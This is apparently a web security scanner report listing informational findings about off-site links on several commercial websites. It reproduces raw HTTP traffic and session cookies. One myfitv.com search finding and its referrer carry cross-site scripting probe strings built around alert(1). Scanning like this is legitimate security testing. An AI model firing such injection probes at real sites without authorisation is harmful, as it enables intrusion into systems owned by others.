<h3 class="r"><a href="http://www.cavtel.com/home-services/products/phone/phone-service/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CMgBEBYwCQ')">Home <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:wDixXkNs_JYJ:www.cavtel.com/home-services/products/phone/phone-service/+telephone+service&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CMoBECAwCQ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.smh.com.au/business/phone-company-licence-breaches-could-cost-1m-under-conroy-plan-20110905-1ju3c.html" class=l onmousedown="return clk(this,this.href,'','','','11','','0CM4BEKkCMAo')"><em>
...[SNIP]...
<span class=tl><a href="http://blogs.wsj.com/digits/2011/09/05/netflix-ceo-looks-beyond-starz-deal/" class=l onmousedown="return clk(this,this.href,'','','','12','','0CNQBEKkCMAs')">Netflix CEO Looks Beyond Starz Deal</a>
...[SNIP]...
<span class=tl><a href="http://www.chron.com/news/article/Phone-restoration-continues-in-Vermont-after-Irene-2155133.php" class=l onmousedown="return clk(this,this.href,'','','','13','','0CNoBEKkCMAw')"><em>
...[SNIP]...

15.119. http://www.myfitv.com/javascripts/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /javascripts/all.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /javascripts/all.js?1314990512 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 06 Sep 2011 12:45:30 GMT
ETag: "64fd2-551ae-4abfa1659cc00"-gzip
Last-Modified: Fri, 02 Sep 2011 19:08:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 348590

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<a class="more_info_link"><img class="button top" src="http://fitv-static.s3.amazonaws.com/more_info' + image_extension + '"/></a>
...[SNIP]...

15.120. http://www.myfitv.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?utf8=%E2%9C%93&query=xss HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:50:36 GMT
ETag: "b06b1c86b03c05bca43a7628c5a0a319"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIiUvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyIPc2Vzc2lvbl9pZCIlNGJlNWEzNzEyYTUxMzU2ZTk3NjdhZGUwZmQ4MGQ1MDg%3D--93112ebe330134a19c07b42f1f52e133e4c4f31d; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.106563
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 30810
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="/videos/236982" onclick="track_navigation('search_video_img')"><img alt="Introduction to the Canon Rebel XSi 450D / XS 1000D" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/51a0KIzDBYL._SX120_SY90_.jpg" video_id="236982" width="120" /></a>
...[SNIP]...
<a href="/videos/576334" onclick="track_navigation('search_video_img')"><img alt="One on One with Cy Waits: XS Nightclub" class="thumbnail" height="90" src="http://pthumbnails.5min.com/5746488/287324358_12.jpg" video_id="576334" width="120" /></a>
...[SNIP]...
<a href="/videos/454547" onclick="track_navigation('search_video_img')"><img alt="Hot Version International - American Touge 2" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/615D0Th6KvL._SX120_SY90_.jpg" video_id="454547" width="120" /></a>
...[SNIP]...
<a href="/videos/454619" onclick="track_navigation('search_video_img')"><img alt="Best Motoring International - American Touge 3" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/61krQR7xOLL._SX160_SY120_.jpg" video_id="454619" width="120" /></a>
...[SNIP]...
<a href="/videos/489359" onclick="track_navigation('search_video_img')"><img alt="Hot Version International - American Touge" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/612lIYYQucL._SX120_SY90_.jpg" video_id="489359" width="120" /></a>
...[SNIP]...
<a href="/videos/687615" onclick="track_navigation('search_video_img')"><img alt="Me and my Shadow Sword" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/517PSd-UWNL._SX120_SY90_.jpg" video_id="687615" width="120" /></a>
...[SNIP]...
<a href="/videos/902148" onclick="track_navigation('search_video_img')"><img alt="Vegas Nightclubs Donate Toys To Kids" class="thumbnail" height="90" src="http://cache.thenewsroom.com/grabnetworks/prod/KVVU5/2010/12/09/0900/story-1_thumb.jpg" video_id="902148" width="120" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/myfitv.com/z300x250;sz=300x250;ord=123456789?" target="_blank" >
   <img src="http://ad.doubleclick.net/ad/myfitv.com/z300x250;sz=300x250;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<a href="/videos/1418289/bachelor-pad-week-4-part-1" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Week 4, Part 1" class="thumbnail" height="90" src="http://thumbnails.hulu.com/943/50171943/50171943_120x90_generated.jpg" video_id="1418289" width="120" /></a>
...[SNIP]...
<a href="/videos/1424891/burn-notice-besieged" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Besieged" class="thumbnail" height="90" src="http://thumbnails.hulu.com/305/40022305/40022305_120x90_generated.jpg" video_id="1424891" width="120" /></a>
...[SNIP]...
<a href="/videos/1425089/friends-with-benefits-the-benefit-of-avoiding-the-mindbanger" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Avoiding the Mindbanger" class="thumbnail" height="90" src="http://thumbnails.hulu.com/973/50171973/50171973_120x90_generated.jpg" video_id="1425089" width="120" /></a>
...[SNIP]...
<a href="/videos/1391790/louie-oh-louie--tickets" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Oh Louie / Tickets" class="thumbnail" height="90" src="http://thumbnails.hulu.com/112/40022112/40022112_120x90_generated.jpg" video_id="1391790" width="120" /></a>
...[SNIP]...
<a href="/videos/1390788/suits-play-the-man" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Play the Man" class="thumbnail" height="90" src="http://thumbnails.hulu.com/164/40022164/40022164_120x90_generated.jpg" video_id="1390788" width="120" /></a>
...[SNIP]...
<a href="/videos/1419176/wilfred-doubt" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Doubt" class="thumbnail" height="90" src="http://thumbnails.hulu.com/375/40031375/40031375_120x90_generated.jpg" video_id="1419176" width="120" /></a>
...[SNIP]...
<a href="/videos/1423467/rookie-blue-a-little-faith" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="A Little Faith" class="thumbnail" height="90" src="http://thumbnails.hulu.com/936/50171936/50171936_120x90_generated.jpg" video_id="1423467" width="120" /></a>
...[SNIP]...
<a href="/videos/1425090/friends-with-benefits-the-benefit-of-being-shallow" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Being Shallow" class="thumbnail" height="90" src="http://thumbnails.hulu.com/972/50171972/50171972_120x90_generated.jpg" video_id="1425090" width="120" /></a>
...[SNIP]...
<div id="footer_social_network_links" align="center">
<a target="_blank" onclick="track_navigation('facebook')" href="http://www.facebook.com/myfitv"><div id="facebook">
...[SNIP]...
</a>
<a target="_blank" onclick="track_navigation('twitter')" href="http://twitter.com/myfitv"><div id="twitter">
...[SNIP]...
<strong><a target="_blank" href="http://www.frontier.com/advertise" onclick="track_navigation('advertise')" style="color:#979797">Advertise with Us</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
<noscript><img src="http://citizenstelecom.112.2o7.net/b/ss/czndevfrontiertv/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

15.121. http://www.myfitv.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?query=XS%EF%BF%BDdace;alert(1)//back HTTP/1.1
Host: www.myfitv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3balert(1)//9336b0fa1c5
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIkYvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyUwMDNkNmNlJyUzYmFsZXJ0KDEpLy85MzM2YjBmYTFjNSIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--bb6a866ba6baf3100ee2ded8fc9da2d273d6affa; fitvuser=fitvuser_etiamsodalesorciat; __utma=158259878.521147127.1315331722.1315331722.1315331722.1; __utmb=158259878.5.9.1315331746856; __utmc=158259878; __utmz=158259878.1315331722.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=158259878.visitor|1=Arrived=2011-09-06=1; __qca=P0-1156348243-1315331724508; s_cc=true; s_sq=czndevfrontiertv%3D%2526pid%253DSearch%252520-%252520my%252520fitv%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.myfitv.com%25252Fsearch%25253Fquery%25253DXS%252525EF%252525BF%252525BDdace%25253Balert(1)%25252F%25252Fback%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:55:49 GMT
ETag: "fb9f9f1510365fc6d678aaa8ef98dfe9"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIjEvc2VhcmNoP3F1ZXJ5PVhTJUVGJUJGJUJEZGFjZTthbGVydCgxKS8vYmFjayIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--3cfbab8b31e39a386ecd183bc1bf9078533ad5c0; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.979724
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 28075
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="/videos/717483" onclick="track_navigation('search_video_img')"><img alt="Strange respiratory virus surfaces in dogs in SW Colorado" class="thumbnail" height="90" src="http://cache.thenewsroom.com/kob/2011/03/24/strange_respiratory_viru_DISTRIBUTION_1304708_preview.jpg" video_id="717483" width="120" /></a>
...[SNIP]...
<a href="/videos/776457" onclick="track_navigation('search_video_img')"><img alt="Asst. Police Chief Fired Over Work Environment" class="thumbnail" height="90" src="http://cache.thenewsroom.com/wsmv4/2011/03/30/00001_tmb_1301529248.jpg" video_id="776457" width="120" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/myfitv.com/z300x250;sz=300x250;ord=123456789?" target="_blank" >
   <img src="http://ad.doubleclick.net/ad/myfitv.com/z300x250;sz=300x250;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<a href="/videos/1418289/bachelor-pad-week-4-part-1" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Week 4, Part 1" class="thumbnail" height="90" src="http://thumbnails.hulu.com/943/50171943/50171943_120x90_generated.jpg" video_id="1418289" width="120" /></a>
...[SNIP]...
<a href="/videos/1424891/burn-notice-besieged" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Besieged" class="thumbnail" height="90" src="http://thumbnails.hulu.com/305/40022305/40022305_120x90_generated.jpg" video_id="1424891" width="120" /></a>
...[SNIP]...
<a href="/videos/1425089/friends-with-benefits-the-benefit-of-avoiding-the-mindbanger" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Avoiding the Mindbanger" class="thumbnail" height="90" src="http://thumbnails.hulu.com/973/50171973/50171973_120x90_generated.jpg" video_id="1425089" width="120" /></a>
...[SNIP]...
<a href="/videos/1391790/louie-oh-louie--tickets" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Oh Louie / Tickets" class="thumbnail" height="90" src="http://thumbnails.hulu.com/112/40022112/40022112_120x90_generated.jpg" video_id="1391790" width="120" /></a>
...[SNIP]...
<a href="/videos/1390788/suits-play-the-man" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Play the Man" class="thumbnail" height="90" src="http://thumbnails.hulu.com/164/40022164/40022164_120x90_generated.jpg" video_id="1390788" width="120" /></a>
...[SNIP]...
<a href="/videos/1419176/wilfred-doubt" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Doubt" class="thumbnail" height="90" src="http://thumbnails.hulu.com/375/40031375/40031375_120x90_generated.jpg" video_id="1419176" width="120" /></a>
...[SNIP]...
<a href="/videos/1423467/rookie-blue-a-little-faith" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="A Little Faith" class="thumbnail" height="90" src="http://thumbnails.hulu.com/936/50171936/50171936_120x90_generated.jpg" video_id="1423467" width="120" /></a>
...[SNIP]...
<a href="/videos/1425090/friends-with-benefits-the-benefit-of-being-shallow" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Being Shallow" class="thumbnail" height="90" src="http://thumbnails.hulu.com/972/50171972/50171972_120x90_generated.jpg" video_id="1425090" width="120" /></a>
...[SNIP]...
<div id="footer_social_network_links" align="center">
<a target="_blank" onclick="track_navigation('facebook')" href="http://www.facebook.com/myfitv"><div id="facebook">
...[SNIP]...
</a>
<a target="_blank" onclick="track_navigation('twitter')" href="http://twitter.com/myfitv"><div id="twitter">
...[SNIP]...
<strong><a target="_blank" href="http://www.frontier.com/advertise" onclick="track_navigation('advertise')" style="color:#979797">Advertise with Us</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
<noscript><img src="http://citizenstelecom.112.2o7.net/b/ss/czndevfrontiertv/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

15.122. http://www.scottrade.com/online-trading.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scottrade.com
Path:   /online-trading.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY HTTP/1.1
Host: www.scottrade.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Day-Servlet-Engine/4.1.8
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 12:48:40 GMT
Vary: Accept-Encoding
Content-Length: 41172
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<me
...[SNIP]...
<li><a href="http://www.facebook.com/Scottrade" class="footer-link fb" target="_blank">Facebook</a></li><li><a href="http://twitter.com/scottrade" class="footer-link twitter" target="_blank">Twitter</a>
...[SNIP]...
<li><a href="http://www.youtube.com/scottradeinc" class="footer-link yt" target="_blank">YouTube</a>
...[SNIP]...
<p>Brokerage Products and Services offered by Scottrade, Inc. - Member <a target="_blank" href="http://www.finra.org/">FINRA</a> and <a target="_blank" href="http://www.sipc.org/">SIPC</a>
...[SNIP]...
</a>, and by downloading the <a target="_blank" href="http://www.optionsclearing.com/about/publications/character-risks.jsp">Characteristics and Risks of Standardized Options and Supplements (PDF)</a>
...[SNIP]...
<noscript><iframe src="//ad.wsod.com/action/8bec9b10877d5d7fd7c0fb6e6a631357/38.iframe.action/" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

15.123. http://www.vonage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?login HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; s_nr=1315328331917-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: vpc=1; expires=Fri, 03-Sep-2021 11:58:56 GMT; path=/; domain=.vonage.com
Set-Cookie: oa_event=1; path=/; domain=.vonage.com
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</span>
                   <a href="http://www.vonage.ca" title="Vonage Canada VoIP Internet Phone Service">Canada</a>
...[SNIP]...
</span>
<a href="http://www.twitter.com/vonage" target="_blank">Twitter</a>
...[SNIP]...
</span>
           <a href="http://www.facebook.com/vonage" target="_blank">Facebook</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://vonage.122.2o7.net/b/ss/vonagedev/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<!--iPerceptions-->
<script type="text/javascript" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_layer_Invitation_722.js"></script>
...[SNIP]...

15.124. http://www.vonage.com/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</span>
                   <a href="http://www.vonage.ca" title="Vonage Canada VoIP Internet Phone Service">Canada</a>
...[SNIP]...
<li><a href="http://twitter.com/vonage_voice">Get short, timely answers from Vonage_Voice on Twitter</a>
...[SNIP]...
<li><a href="http://www.vonagemobile.com/support/help_center">Get Vonage Mobile Facebook support</a>
...[SNIP]...
</span>
<a href="http://www.twitter.com/vonage" target="_blank">Twitter</a>
...[SNIP]...
</span>
           <a href="http://www.facebook.com/vonage" target="_blank">Facebook</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://vonage.122.2o7.net/b/ss/vonagedev/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

15.125. http://www.xfinity.com/js-api/compressed/xpbar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xfinity.com
Path:   /js-api/compressed/xpbar.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom HTTP/1.1
Host: www.xfinity.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
